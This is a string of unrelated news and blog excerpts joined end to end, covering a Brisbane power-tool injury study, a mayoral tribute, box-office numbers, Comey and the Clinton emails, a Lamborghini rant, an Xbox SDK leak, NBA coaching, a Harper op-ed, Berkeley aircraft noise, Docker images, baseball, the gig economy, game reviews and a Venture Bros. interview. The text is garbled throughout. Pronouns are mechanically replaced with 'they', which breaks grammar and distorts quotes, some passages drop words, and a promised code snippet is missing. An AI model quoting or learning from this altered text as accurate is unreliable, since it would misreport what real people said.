Mr Armstrong has joined a joint University of Queensland and Queensland University of Technology study .
Lead researcher Dr Rob Eley said they wanted to interview at least 200 victims to understand how these accidents happen and discover if they are preventable .
`` Because people are using tools inappropriately , whether they are not trained to use them , whether they are using them for the wrong job , or if the tools are malfunctioning , '' they said .
Dr Eley said DIY disasters from power tools have grown dramatically since the advent of home handyman TV shows .
Injuries can be anything from a trivial laceration to a life-threatening event .
`` A nail gun to the head can be life threatening , an angle grinder to the abdominal wall can be life threatening , '' Dr Georgia Livesay said .
Up until now studies into these kinds of injuries have only looked at hospital admissions , rather than visits to emergency , where an estimated 75 per cent of patients actually end up .
`` So we believe we have missed a significant number , '' Dr Eley said .
The study will combine injuries treated at both the PA Hospital and the Royal Brisbane and Women 's Hospital .
Topics : diseases-and-disorders , health , disasters-and-accidents , accidents , brisbane-4000 , qld
Greg Durocher , president of the Cambridge Chamber of Commerce , served on council with Brewer in the late 1980s . They had gotten to know them when they were on the Preston Towne Centre BIA and Brewer was the council liaison to the committee .
“ She was very supportive of anyone who was willing to run for office , ” Durocher recalled . “ She was my mentor for many years . They were very encouraging , but they could also give you a kick in the butt if you needed it . They were a brilliant politician and had a great spirit . ”
Durocher said they had a close relationship with Brewer , and they really understood and was devoted to the community .
“ Even when their daughter died , we knew they must have been in an incredible amount of pain … but , they were as solid as a rock and stayed in control , ” they said . “ I once asked them ( prior to their retirement ) when they were going to take some Jane time and they told me : ‘ I 'm doing exactly what I want to do . ' ”
Durocher said Brewer “ was always interested in what was happening in the community and always young at heart . ”
“ She was always a great champion for the Cambridge . ”
In 2014 , the Cambridge Chamber of Commerce honoured Brewer with a lifetime achievement award as well as an award for their work as a politician .
At that time , Regional Chair Ken Seiling stated : “ She always represented Cambridge interests well , I always thought , yet they had that big-picture vision . They had a way of doing it that it was n't combative , it was ‘ I 've thought this out , I 've reasoned , I have the facts and here 's how I see it . ' ”
“ She was a truly lovely lady and a great representative of Cambridge and the Region , ” Seiling said Tuesday . “ She was a good church woman . They were a great friend to people and maintained those friendships . Everyone who worked with them could n't help by be fond of her . ”
Mayor Doug Craig took the reins of the city from Brewer in 2000 . They had served on council with Brewer for more than a decade prior to that , and continued to serve with them on regional council until their retirement several years ago .
“ She was very well respected by everyone that knew her , ” Craig said of Brewer .
“ She came into office at a time when the city was growing very rapidly and I believe they were the right person , at the right time , ” they said .
“ I think they will be remembered for giving us nine years with nine zero per cent budgets . ''
Craig said they had a good working relationship with their predecessor and they would talk from time to time about different things going on in the city .
“ Jane may have left politics , but they still continued to be part of the community , ” they said . “ She called a few weeks ago and they were unhappy with myself and council over a particular issue , but once again they had the community 's best interest at heart . ”
Flags have been lowered to half-mast at city facilities and a book of condolences is available at city hall for people to sign .
— with files from Richard Vivian
One thing you can say about South Korea is that it 's Tom Cruise country . Universal 's The Mummy just opened there and charted the biggest opening day ever in the market with $ 6.6M ( kw 7.3 billion ) , outstripping the first day of last year 's local hit Train to Busan ( kw 6.5 billion ) . In addition , The Mummy notched the biggest opening day for a Tom Cruise movie or a Universal release in the territory , and the biggest opening day in South Korea this year .
Currently , The Mummy is dominating South Korea with 59 % of the market share . It also helps that it 's a holiday there .
Cruise 's 2014 actioner Edge of Tomorrow was a huge hit in South Korea , opening to $ 10.5M and earning $ 38M , the film 's second-biggest territory outside of China . Mission : Impossible — Rogue Nation was even bigger , debuting to $ 13.8M in 2015 and ending its run at $ 41.6M .
This weekend , The Mummy , a reboot of Uni 's popular early millennium franchise , will land in 63 overseas territories , including key markets such as China , the UK , Mexico , Germany , Australia , Brazil and Russia . France and Japan come later .
FBI Director James Comey acted 'against the guidance they were given ' on Friday ( a katz
As of Saturday night , the Federal Bureau of Investigation still did not have a warrant to view the emails it is purportedly investigating in the reopening of its case regarding Democratic presidential nominee Hillary Clinton and their use of a private email server during their tenure as Secretary of State .
Yahoo News reporter Michael Isikoff attempted to question FBI officials about the contents of the emails alluded to by Director James Comey on Friday , but found that the officials themselves have yet to view the emails . So far , they 've been unable to obtain legal authorization to do so .
An official told Isikoff that Comey “ had no idea what was in the content of the emails ” when they sent their letter to Congress on Friday advising them that they are reviewing new materials that may prove pertinent to the investigation against Clinton .
The Justice Department has not granted approval for FBI agents to examine the materials , so FBI officials have no idea whether the emails contain sensitive or incriminating information or anything investigators have seen before .
“ We do not have a warrant , ” a senior law enforcement official told Isikoff . “ Discussions are under way [ between the FBI and the Justice Department ] as to the best way to move forward . ”
The new emails were found during an investigation into disgraced Democratic Congressman Anthony Weiner ( NY ) and their sexting relationship with a teen girl .
Isikoff noted that the fact that the FBI has no idea of the contents of the emails is important because members of Donald Trump 's media team have insisted that the FBI would not be reopening the investigation if it had n't found something significant .
Comey 's decision to notify Congress about emails of which they neither knows the contents nor pertinence has proven controversial and some have speculated that their motivations are political .
On Friday , they sent an internal letter to FBI personnel explaining their decision to send the letter to Congress . Comey said , “ Because those emails appear to be pertinent to our investigation , I agreed that we should take appropriate steps to obtain and review them . ”
Senior Justice Department officials are reportedly “ apoplectic ” that Comey would make their move based on so little evidence at such a critical time in the U.S. election . The director was “ strongly discouraged ” from sending the letter , said one official , who said that Comey was “ acting independently of the guidance given to him . ”
Riley Roberts — a former aide to Attorney General Eric Holder — wrote in Politico that Comey is a loose cannon who is as high-handed and unaccountable a director as the FBI has seen since J. Edgar Hoover .
“ Come January , ” Riley said , “ whoever steps into the Oval Office will find , in Comey , a formidable antagonist : not the wrathful demigod Kennedy encountered in Hoover , but every bit as untouchable . ”
This , ladies and gentlemen , is the . And that 's no mean feat ; Lamborghini spent its early years making ugly tractors . And then there 's the bile-inducing Rambo Lambo LM-002 ... But this Espada model - which was built between 1968 and 1978 - is just wrong from every conceivable angle . Even its underneath is unattractive . Probably . In case you 've never seen or even heard of this thing , a quick history lesson is in order . The three-doorEspada ( ironically meaning sword ) was popular , very popular . In fact , 1217 of these GT monstrosities hit the showrooms , making it theat the time , more so than the Miura . Power came courtesy of a , which produced 325bhp early on , with power hiked up by 25bhp to 350 horses from 1970.So now we 're all clued up , back to the matter at hand . The Espada features a . It 's rump too is at complete odds with the GT car 's front and the flat rear wheel arches look just as awkward . I also hate the wheels , am offended by theand vehemently dislike the rear hatch . ( At least we now know where the Prius got its inspiration from ... ) As for the front ? That'sand makes even the Jensen Interceptor look pretty.What really makes me angry though is the utter . It has no business being nestled in such an unsightly skin and puts today 's super and luxury car cabins to complete shame . The Espada boasts sumptuous , an attractive wooden dashboard and a steering wheel you just know you 'll love wrapping your greasy mitts around.Despite the Lambo Espada 's offensive looks there are , as ever , people who simply love the things ( heck , I think the Audi Sport Quattro is good looking ) . Speaking of which , look what I 've just come across :
The Xbox One quietly received additional updates to its software development kit ( SDK ) in November and December that freed up more resources for game developers . A leak of the SDK documentation on Friday , combined with a recent interview with the developers of Dying Light , is yet another example of how consoles are still in development even after they 've launched .
The latest SDK documentation for the Xbox One was leaked by hacking group H4LT via Twitter . Eurogamer 's Digital Foundry tech experts dug into the documentation and discovered that Microsoft has freed up even more of resources for the console .
At launch , the Xbox One reserved two of the console 's eight CPU cores for the operating system and the Kinect sensor , plus some of GPU was reserved as well . A June 2014 update freed approximately 10 percent of GPU resources that were reserved for Kinect by making use of the sensor optional for games . This allowed games like Destiny and Diablo III to reach the coveted 1080p resolution on the console
The leaked SDK shows that Microsoft has now freed up 50 to 80 percent of the seventh core . The extra access comes with some tradeoffs , however .
Digital Foundry points out that “ developers need to give up custom , game-specific voice commands in order to access the seventh core at all , while Kinect 's infra-red and depth functionality is also disabled . Secondly , the amount of CPU time available to developers varies at any given moment – system-related voice commands ( ‘ Xbox record that , ' ‘ Xbox go to friends ' ) automatically see CPU usage for the seventh core rise to 50 per cent . ”
In other words , the amount of resources available to developers in the seventh core can fluctuate based on voice commands . That will be true for anyone who has a Kinect and uses some of the common voice commands , but not those who picked up a Kinect-less console . Still , it 's something that developers have to account for .
Techland 's 'Dying Light '
Meanwhile , Dying Light developer Techland recently revealed that a December update to the Xbox One SDK brought another performance boost thanks to better ESRAM management . This and other improvements allowed the developer to get their zombie survival game up to 1080p .
For those that do n't know , ESRAM is a memory cache for the console that is meant to give its slower DDR3 memory a speed boost . It 's small size and management has proven challenging to developers , however .
“ We were using the latest version just prior to the new release that came out on December 12th . In terms of advantages , the main thing is just how much the ESRAM control has improved , ” Lead Game Designer Maciej Binkowski told GamingBolt .
“ The new API allows you to do a lot more with the ESRAM , things devs have always wanted to do but were not easily accessible . This together with better tools ( PIX ) allowed us to really improve performance and tweak ESRAM usage , ” they added .
Such is the nature of modern console development . The Xbox 360 and PlayStation 3 evolved greatly over their lifespans . Expect the same with the Xbox One and PlayStation 4 . Microsoft already has something Xbox related with its upcoming Windows 10 release . How much it and the DirectX 12 graphics API will change the console , and how Sony responds for the PS4 , remains to be seen .
What do you think of these changes to the Xbox One ? Sounds off in the comment below .
[ Images via Jagat Play , Dying Light ]
By their own admission , Monty Williams felt strongly that they had one of the best jobs in the NBA .
Two weeks ago before they were fired on Tuesday after five seasons , Williams jokingly said coaches would pay to coach star forward Anthony Davis because of their remarkable talent .
With a talented core of players , which includes Tyreke Evans , Eric Gordon , Ryan Anderson in addition to Davis , the Pelicans ' vacant head coaching job is considered to be far more attractive now than it was in 2010 when the franchise last conducted a search for a head coach before it hired Williams .
Back then , the franchise was in transition with former point guard Chris Paul stating publicly they would welcome a trade if the franchise was n't committed to building a championship roster .
Also , former owner George Shinn and their minority partner Gary Chouest were locked in a prolonged stalemate to reach a final agreement on an ownership transfer that never happened before the NBA was forced to purchase the franchise in December 2010 from Shinn , who was struggling financially .
But with Pelicans general manager Dell Demps just starting the search for Williams ' replacement , the Pelicans are in a much better position as a more stablized franchise .
The Pelicans finished 45-37 this season and earned the final playoff spot in the Western Conference behind the emerging play of Davis , who averaged 24.4 points and ended the regular season leading the NBA with a 2.9 blocks per game average . The Pelicans were swept in four games by the top-seeded Golden State Warriors , but Davis averaged 31.4 points and 11.0 rebounds in the series .
'' I feel like we have a good core , obviously it 's centered around Anthony Davis , '' Demps said . '' I think we have good players on this team and our goal is to keep going in the right direction . We have n't begun the search yet , but we 're going to find the available candidate . I feel good about the direction we 're going . ''
League sources confirmed on Wednesday that the Pelicans are waiting to see if the Chicago Bulls and coach Tom Thibodeau are going to part ways . If Thibodeau is let go by the Bulls , they could possibly emerge as a candidate for the Pelicans ' job .
In June 2010 , Thibodeau was a finalist for the then-named New Orleans Hornets head coaching job with Williams . But the franchise turned its attention to Williams after Thibodeau , who was a Boston Celtics assistant at the time , indicated they planned to pursue the vacant Bulls job , which they took .
Although sources have not confirmed , potential candidates for the Pelicans ' vacancy could include former Oklahoma City Thunder coach Scott Brooks , former Golden State Warriors coach Mark Jackson , Warriors current lead assistant Alvin Gentry , Pacers assistant and former Trail Blazers head coach Nate McMillan , former Sacramento Kings and Pelicans assistant Mike Malone , Chicago Bulls assistant Adrian Griffin , University of Kentucky coach John Calipari , former New York Knicks and Houston Rockets Jeff Van Gundy .
Contacted by telephone on Wednesday , Van Gundy declined to comment about the Pelicans ' vacancy and whether they would be interested .
'' I just do n't want to comment anything about a coaching opening , '' Van Gundy said . '' It just makes me uncomfortable . ''
Demps said on Tuesday the Pelicans ' coaching search would start immediately but they did n't have a time frame on making a hire . Demps also did n't disclose specifics on whether they are pushing to hire a former or curent NBA coach or would consider a top-notch college coach like Calipari or an NBA assistant .
They also said they have not established a short list of potential candidates to pursue yet .
'' Hopefully , we can find someone to take us to the next level , '' Demps said . '' Obviously , I think we 're just going to find a coach that we feel is good for us . We want to get to the point where we can compete for championships . I feel it 's very stable here right now . ''
It 's time that the Prime Minister of Canada realized the pressing need to spend more time at home tending the Canadian garden . Their tendency to neglect key domestic files while being often out of the country is obviously hurting their government and the Conservative Party .
It was perfectly symbolic that the Supreme Court 's bombshell ruling on the Marc Nadon appointment should have come when Stephen Harper was on a flight to Ukraine . At key stages in the developing Senate scandal , reporters have had to pester them in New York and Peru for comment . The Prime Minister always looks happier abroad than in Ottawa . Whether or not Mr. Harper is travelling more than their predecessors , it is rapidly becoming clear that they are too inattentive to business in Canada .
The image of Stephen Harper as a control freak pulling every political string in their government has never been particularly accurate . As any leader must , Mr. Harper delegates . Their problem is that they are delegating important domestic political issues to a fault , leaving matters to staffers and ministers who are not up to their jobs .
Story continues below advertisement
That proved spectacularly true with the staff of the Prime Minister 's Office in its handling of the Senate mess . Mr. Harper compounded this failure of competence and integrity by not cleaning house or offering a serious explanation to Canadians . Instead they forced a hapless parliamentary secretary to virtually destroy a career with comical evasion and repetition .
In recent weeks it 's also become clear – but it has been no surprise – that the government 's attempt to reform our electoral legislation has been bungled in both drafting and defence by the Minister of State for Democratic Reform , Pierre Poilievre , a political lightweight with no credibility outside of the most extreme partisan circles . So far , our too-often-absent Prime Minister has given Mr. Poilievre neither back-up nor the back of their hand , even as the government 's reputation for electoral integrity continues to erode .
Now we have an enormously serious blow to the government because of an unprecedented botching of the Prime Minister 's latest Supreme Court appointment . There will be an intense postmortem of this mess , but it is striking that once again the man who made the appointment is not present to explain themselves and show us the future .
Of course all leaders are occasionally victimized by bad timing . But Mr. Harper 's foreign travel seems to represent a deliberate agenda . They may particularly enjoy the company of global movers and shakers ; they may feel they are playing an important role on the world stage ; they may think their foreign policies play well with voters at home . Their penchant for globetrotting is reminiscent of their great Conservative predecessor , Sir Robert Borden , who was often abroad in 1917-1919 working on issues of war and peace . Borden had never much liked the muck of domestic politics .
But Borden had much more justification for being at , say , the Paris Peace Conference , than Mr. Harper has for grandstanding in Ukraine , junketing in Israel , or hobnobbing at pointless G8 meetings . And notwithstanding Borden 's real statesmanship abroad , their government and their party eventually paid a huge price in Canada when incompetent lieutenants , such as the arch-partisan Arthur Meighen , alienated one domestic constituency after another .
It took about a third of a century for Canadian conservatism to recover from Borden 's inattention in their final years as leader . As the Conservative Party continues to trail in the polls , it 's surely time to wonder whether the verdict of history on Stephen Harper may be that after 2011 they were too often wandering around the world – courting foreign glory Canada does not have – when they should have been at home minding their business , and ours .
Michael Bliss is a historian , author and professor emeritus at the University of Toronto .
As a longtime resident of Berkeley and the East Bay , I 've noticed a number of changes in the past two decades . But it was n't until having a newborn that I realized the barrage of low-flying aircraft at all hours of the day and night . These loud buzzing planes , which populate our skies , are distinct in tenor from commercial airline traffic . These are the loud motors that sound like they could cut out at any second and crash into your house . In addition to the increased vehicular traffic , and of course , the BART and buses , planes are a major contributor to disrupting Berkeley 's peace .
The problem with loud , low-flying aircraft is that their noise may be causing not-yet-attributed death and disease . How many millions of hours of lost sleep each month are lost in Berkeley due to people waking up , having visceral physical reactions to the shudders from low frequency deafening vibrations , and not being able to get back to sleep or experiencing increased heart rate ? How many Berkeley residents , especially children and the elderly , are taking medications in part unwittingly as a result of these regular onslaughts of sound ?
Currently , we have few data on these issues locally . But the burgeoning field of sound pollution , and the negative effects noise can have on human , animal , and even plant health , points to very real health outcomes from constantly noisy environments . Noise pollution causes constant background anxiety and stress , elevating cortisol levels , and decreasing tolerance to stressful situations . Combined with preexisting issues , it is very possible that the secondary and tertiary physiological effects from the noise and low vibrations from aircraft could be causing health events leading to disease and emergency room visits . Increased ambient noise can even lead to increased crime rates .
Berkeley 's current situation , with scores of nonessential anonymous low-flying aircraft blighting our skies and our nervous systems each day , presents a perfect opportunity for a public health intervention . As we ca n't know the salutary effects of silence until we experience it , restricting traffic over our airspace , and looking at the change in emergency room admissions , would allow a natural experiment to determine whether this public health intervention is warranted long-term . Comparing crime statistics for this period of relative quiet might also be productive and surprising . Sound , especially pervasive low noises ( often used intentionally by police forces to combat protesters and in war situations ) , can become so ubiquitous as to be unnoticeable ; and yet , it can have a profound consequence on our health and behavior .
There are also other issues broached when looking at how noise determines our health . There 's the social justice issue : Are these planes only frequenting the flatlands ? Or are they equally annoying the Berkeley Hills ? Is the nuisance not as noticeable or disagreeable for those who can afford to have triple-paned windows , compared to those with more sonically porous structures ? What about the additional negative effects this is having on Berkeley 's houseless population ?
Then there 's the environmental issue : How is birdsong negatively affected by loud tremors caused by aircraft ? Do they mate less ? Is there song distorted ? Are other local mammals also harmed through their communication , not able to pierce the background buzz ?
Finally , there 's the city rights issue : For what purpose are these planes flying over our city and county ? Are they all fully licensed ? Are these mere joy rides ? How does the pleasure of these aviators measure against the negative health effects to the environment and our health they cause ? Is our airspace a democratic territory where we as residents decide whether the harms are worth it ?
From a public health standpoint , these questions beg answering before we press the snooze button and go back to the status quo . Research in the social determinants of health indicate that the varying degree of exposures to harms and the varying protective or insulating resources we have , play an enormous role in determining who gets sick and experiences severe health events , and who prospers . The City of Berkeley would be wise not to turn a deaf ear to the serious consequences of noise pollution in our community .
As some of the most innovative companies like Oculus and Gilt Groupe jump into Docker containers , more and more base images appear on Docker Hub that can be used to containerize your applications . With this said most of these Docker images has one or more of the following issues :
big in size
strange / non-existent versioning
mutable tags
unmaintained
We are happy to release our Alpine-based Node.js Docker images that try to solve those pain points . In this article , you will learn about why we went with Alpine , how we version our images and how you can start building applications using them today .
Meet Alpine Linux
Alpine Linux is a Linux distribution based on musl and BusyBox , primarily designed for `` power users who appreciate security , simplicity and resource efficiency '' . It uses PaX and grsecurity patches in the default kernel and compiles all userspace binaries as position-independent executables with stack-smashing protection .
Lately , rumors arose that even Docker , Inc is planning to move its infrastructure from Ubuntu to Alpine .
Versioning our Docker Images
At first , it may seem strange how we versioned our Alpine-based docker images - let me explain .
Each tag that we released and going to release has the following format : [ linux-version ] - [ node-version ] - [ project-version ] . So if you see something like this : 3.3-v4.2.6-1.1.3 then that means that you are going to use 3.3 of the given Linux distribution , v4.2.6 of Node.js and the project that generated the image is at 1.1.3 . You may wonder : why do we need the project version ? As we love immutable deployments we believe that Docker tags should be immutable as well - we achieve this immutability by appending that extra version number .
The reason for this is the following : if dependent package that 's not related to the operating system nor Node.js itself directly ( like a security update ) we bump the package version number .
Dockerizing Your Node.js Application
Once you have Docker installed on your computer containerizing your application is straightforward .
First , you have to create a Dockerfile .
Once you have it simply copy-paste the following code snippet :
So far so good - but what 's going on here ? We just copy our package.json into the image , then run npm install then copy the rest . These copy steps are done separately because Docker works using layers that can be cached . So if our package.json does not change , Docker does n't need to install the dependencies on each build saving us a lot of time .
Next up
In the coming weeks , you will see more articles on how can you use Docker containers with Node.js and microservices on the blog . To be notified , subscribe to our newsletter !
After finishing in second place behind the hands-down favorite Los Angeles Dodgers in 2013 , the Arizona Diamondbacks seemed like clear-cut challengers for a playoff spot this season . General manager Kevin Towers spent the offseason bolstering weak spots on the D'Backs ' 25-man roster . They added a legitimate middle of the order power threat in Mark Trumbo and seemingly solidified the starting rotation with Bronson Arroyo , although those acquisitions , among others , have proven insufficient for Arizona in the 2014 MLB season .
The D'Backs ' struggles are n't temporary . They own a pitiful minus-66 run differential to rank as the least competitive team in baseball . They 've also posted an inconceivably poor 4-17 home record , fueling their overall mark of 16-27 . Arizona 's lack of pitching prowess within the confines of a hitter-friendly ballpark has been devastating . They own the worst collective ERA in the big leagues , surrendering 4.76 earned runs per contest .
Arizona does n't boast enough firepower on offense to mitigate the effects of consistently awful pitching performances . As a team , Arizona has registered an inefficient .304 on-base percentage to rank 25th in the league . While slugging first baseman Paul Goldschmidt remains a bright spot , Trumbo has been on the shelf with a stress fracture in their foot since late-April . At the time of their injury , they were leading the National League with seven home runs .
Arroyo , a proven veteran , is the “ best ” pitcher Arizona flaunts on its roster , but their numbers do n't exactly jump off the stat sheet . The 37-year-old hurler owns a 4-2 record with a 4.15 ERA in eight starts this season . They signed a two-year contract worth $ 23.5 million over the offseason , a deal that Towers severely overpaid to complete .
Arizona had serious hopes of being the team to upend the Dodgers in 2014 after finishing 81-81 last season . They seemingly closed the gap on paper by making a pair of solid acquisitions , but Towers has built a team that can not succeed within the air-conditioned climate of Chase Field .
The D'Backs are buried in the basement early on in the 2014 season , and things do n't appear destined to improve . They 're a poorly constructed ball club put together by a GM who continues to fail no matter where they call the shots from . The D'Backs are now a clear-cut last place team with zero chance of contending .
John Shea is an MLB writer for RantSports.com . Follow them on Twitter @ cutthroatpicks . “ Like ” them on Facebook or add them to your network on Google .
I know that I did a mistake with this muzzle but I think that eyes are better than usually .
Do not copy or use . This artwork belongs to me . If You want to post this painting somewhere , do not remove my sign and credit me . Thanks !
Find me also at :
Facebook art page
Furry Network
I finished this painting at 4 AM and the sky looked like this in real . I did this artwork to practice the new technique of digital painting . Just wanted to learn something.I know that I did a mistake with this muzzle but I think that eyes are better than usually.Do not copy or use . This artwork belongs to me . If You want to post this painting somewhere , do not remove my sign and credit me . Thanks ! Find me also at :
Legal body responds to concerns over ‘ gig economy ' firms such as Uber and Deliveroo amid slide in tribunal cases
Government-backed inspectors should be able to investigate companies and entire industries to prevent unscrupulous companies falsely labelling workers as self-employed , according to a leading legal body .
In a submission to the independent review of employment practices led by Matthew Taylor , the Law Society also recommends the immediate scrapping of employment tribunal fees , which have led to a 70 % fall in claims in the last three years . It also says every worker should receive written clarification of their employment status .
It suggests that the Gangmasters and Labour Abuse Authority , which already has some investigatory powers over food and farming operators , could be handed responsibility to carry out investigations into employment status in all businesses .
Nearly 10 million Britons are in insecure work , says union Read more
The Taylor review , which was commissioned by the government last year , is expected to publish recommendations in the next few weeks .
“ Our rights at work are not optional – they are the minimum standard to which we are entitled , ” said the Law Society president , Robert Bourns . “ Our law relies on individuals taking their employer to court to get their rights recognised – a task that is simply beyond most people . Bad employers know this and take advantage of it to cut corners and underpay people , knowing they 'll probably get away with it .
“ An independent government inspector who can go into a business to ensure staff are being given their proper workplace rights will help put a stop to this exploitation , and put everyone on a fair and even playing field . ”
The rise of platforms including Uber , Deliveroo and online retailers , most of which say their drivers and riders are independent contractors , has led to growing concern that millions are stuck in insecure and stressful work in the gig economy .
Self-employed independent contractors are not entitled to holiday pay , sick pay or pension contributions . In contrast those categorised as workers have a degree of independence and can be self-employed but they are also entitled to limited rights including the national minimum wage and holiday pay . The most secure are employees , who have full rights including entitlements to flexible working , maternity pay and sick pay .
The importance of these categories has been highlighted by a string of tribunals led by trade unions questioning the status of drivers and riders including successful cases brought by cycle couriers at CitySprint and Excel and drivers for taxi app Uber . All three cases found the riders and drivers were workers .
Evidence suggests a significant minority of employers are circumventing employment protection legislation . Research from Citizens Advice in 2015 suggested that one in 10 people , or about 460,000 , have been mislabelled self-employed . In January , the TUC reported that the number of people without guaranteed hours or baseline employment rights had risen by more than 660,000 ( 27 % ) over the past five years .
The Law Society suggests a comprehensive review of employment legislation and clearer definitions of employment categories . It says all businesses should be forced to clarify the status of their workers in writing .
Taylor has said they are considering allowing workers to check directly with the government whether attempts by companies to class them as self-employed are legitimate . They are also considering whether to give agency workers on variable hours the right to request a permanent contract after a certain period .
It started out as a simple mission . Just head to the seafloor to collect some contaminated plant samples . Things started going bad almost immediately , and they have n't exactly stopped . First , communications from the tower topside went out , then your submarine crashed leaving you more or less stranded . With no way to communicate and a mission that needs completing , you head out into the ocean to finish the job you were sent here to do . But you do n't know why your sub crashed , and the dark water and obstacles down here make you think something more is going on . That 's Anoxemia . See at Microsoft Store
Dark and gloomy
This is a world filled with dark blues , shadows , and an overall gloomy outlook . That 's pretty much to be expected too , considering that you 're down at the bottom of the ocean . The boundaries of each level show up as the black outline of caves , and while you are n't running and jumping around it plays like a platformer . There are a variety of items , and they all pop from the background , generally by using bright , pale colors that look almost otherworldly against the darkness of the scene . While there are plenty of obstacles floating through the water around you , you might not see all of them until you deploy your sonar . You 'll see floating mines , turrets , and even nasties that will float at you if they detect movement . All of these obstacles are black , with turrets and mechanized weapons glowing red . You 'll also see red halos around them when you deploy your sonar , to show you precisely where they are . For the most part the graphics are simple , but quite evocative . The dark colors and shifting obstacles add to the feel of tension in the air . The dark colors make anything bright seem alien . It all adds to the atmosphere and feel that may remind old-school gamers of Ecco the Dolphin on Sega Genesis . It only goes downhill from here
You , Dr.Bailey , were called in to deal with the collection of corrupted seaweed samples on the bottom of the ocean floor . It looked like an easy job , but things went bad and they went bad fast , from the communications blackout with the tower on the surface to their submarine crashing and stranding them on the ocean floor . They decide that since he 's stranded at the bottom of the ocean , they might as well start collecting the samples they were sent here for . It 's dark on the ocean floor , and things are not as simple as they were originally set out to be . Massive mines chained to the ocean floor , small floating mines above you , Turrets that attack as soon as they see you , it just seems to be a lot of firepower for an area mostly devoid of life . Except that Dr.Bailey is definitely not the only one who is down there . There is something else , lurking in the darkness , and it does n't seem to like the good doctor so much . You get a creepy , crawling vibe that 's helped by the scenery and the haunting music . We 're not going to give it away , but you are not alone down there , and it 's going to be dangerous going . Follow that drone
Donald Trump toured a gun factory in New Hampshire last May as they prepared to launch their presidential campaign .
The manufacturer , Sig Sauer , maker of the semi-automatic rifle believed to have been used in the Orlando shooting rampage .
Nor was it the only time that the fifth largest supplier of firearms in America featured in the tycoon 's run for the White House .
In February , their sons Donald Trump Jr. and Eric also visited the factory , posing for a photo with MCX rifles - the type of gun reportedly used by Omar Mateen as they killed at least 49 people early Sunday in the Pulse nightclub .
And earlier this year , they posed for photos with Sig Sauer representatives at the National Shooting Sports Foundation 's annual trade show in Las Vegas , where Mr Trump was making a speech .
Share . Currently planned for PS3 and PC . Currently planned for PS3 and PC .
If you spend enough time walking around the floor of E3 , eventually you 'll find your way to the smaller booths on the side of the aisle . And there , mixed in with the walls of colorful Wii U Gamepad protective cases , you sometimes find some interesting ideas . At first glance , the MAG II looks like another lightgun , but in reality , it 's an impressively simple controller for first-person shooters .
MAG II creator G-Mate Controller claims its new gun controller is compatible with all shooting games on the PS3 and PC . Xbox 360 compatibility is planned for the future . At E3 , we played a couple rounds of Gears of War with the MAG II , and simply moving the controller in any direction changed the point of view . Walking is still controlled with an analog stick , as in similar gun controllers . And of course , the triggers and buttons are aligned with the grip .
One of the more interesting features of the MAG II , beyond the ability to play a FPS without a sensor bar or secondary controller , is its myriad of settings . A dial on top of the device allows for sensitivity changes on the fly , and there 's even a turbo-fire setting and `` continuous melee '' option . A small button the front of the MAG II calibrates the gyroscope for aiming , and amazingly enough , it worked really well .
Clearly , the MAG II is n't for everyone , but it does seem like a hassle-free way to use a gun analog with shooters . G-Mate has n't made release date information or pricing available .
Matt Clark is a freelance writer covering the world of videogames , tech , and popular culture . Follow them on Twitter @ ClarkMatt and MyIGN at Matt_Clark .
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
This Monday at Midnight , the Venture Bros. are back . And they 've brought some friends .
The Adult Swim series kicks off its sixth season with this hour-long special dubbed All This And Gargantua 2 , and the two men behind it all -- Team JackHammer , aka Jackson Publick and Doc hammer -- talk with Newsarama about the upcoming special as well as the new season . Adult Swim has provided clips and pics from it as well that make sure fans get their Venture fix .
Here 's the clip , then come back for the interview :
Newsarama : So I 've had the chance to watch All This And Gargantua 2 and there 's no hyperbole , this really does change the landscape of the show entirely . How long was this all plotted out ?
Jackson Publick : For a while now , I guess .
Doc Hammer : That outer space special was even something we were trying to be the finale of last season . So it 's about since definitely last season .
Publick : Since the middle of last season at least , but it 's been brewing for a long time .
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
Hammer : Yeah , see what we do is , when we plan a season , somewhere in the middle we get really excited about the upcoming season instead of the one we 're working on . [ laughs ]
So all of that has been around since season five , because , pardon the cliche verbiage here , game-changing stuff has been around since season five .
Nrama : Okay , yeah , because it felt like season five ended abruptly .
Hammer : We ran out of episodes .
Publick : We were spoiled the year before when the network let us kind of go back and do a big episode and we 're just used to longer seasons . We were n't used to writing a ten episode slot so we went and asked “ hey , can we just have two more to make an hour finale ? ” and it did n't work so we saved it for a special . So here it is !
Hammer : And we were pretty vocal about season five actually ending on the penultimate episode . We thought we would work and its sort does wrap up that season , but we did have a major story to tell and did n't get to tell it .
Nrama : Next month , The Venture Bros. celebrates its 12th year on the air . Did you ever think it would be going on this long ? I mean you guys were almost there at the start .
Publick : Nope !
Hammer : We did n't think we 'd make it past season one !
Publick : A dozen years goes by quicker than you 'd expect especially when it takes you three years to make a season . [ laugh ]
If you told me in 2004 or 2003 that we 'd still be making it now , I would n't have believed you . Unless you told me that we also had three feature films underneath our belts also .
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
Hammer : Exactly . That and somebody had called us for Doctor Strange .
Publick : Yes ! And the Doctor Strange screenplay !
Nrama : Are you excited for Cumberbatch as Stephen ?
Hammer : Sure . I mean , how excited am I going to get when I ca n't play Strange or write it , but with that aside , I think Cumberbatch is awesome and I think he 'll do great in the role . You know what , though ? If you have told me we 'd still be on the air and be everybody 's favorite underground cult TV show ? Would n't have f -- -- n ' believed it . That 's what I ca n't believe .
Publick : I would n't have believed there was a Doctor Strange movie ! When we started there was the first Spider-Man movie and the second , and best , X-Men movie . That 's all there was . That 's why we got too many notes about being “ too nerdy ” .
Nrama : You actually got notes saying you were too nerdy and to town that down ?
Hammer : Oh absolutely . In the first season , yes , but let it be said after that we were trusted to do whatever we want to do .
Publick : In the first season , yes , but let it be said after that we are trusted to do whatever we want to do . There was a lot of pushbacks about White and Billy 's nerd banter .
Hammer : I mean , we work for one of the greatest networks and when they saw it working and understood the zeitgeist , we never got that note again . We do n't work for morons , but also not complete dorks like we are .
Nrama : Especially with characters like Augustus St . Cloud roaming around .
Hammer : Clearly we 've enjoyed the ability to outnerd ourselves . And I mean 21 is deep nerdcore .
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
Nrama : At the end of the last season 's finale , you have 21 moving back in with the Monarch and Dr. Mrs . The Monarch , are we going to see more of that family dynamic again ?
Publick : Very much so .
Hammer : Of course , but it 's a new family dynamic . I mean things went down ! The Cocoon went down and now it 's a much tighter family unit . I mean we lost 24 , I mean , we did n't “ lose ” him . We killed him . We made Monarch and 21 a comedy team that we 've never been able to do and write for and it 's been so much fun .
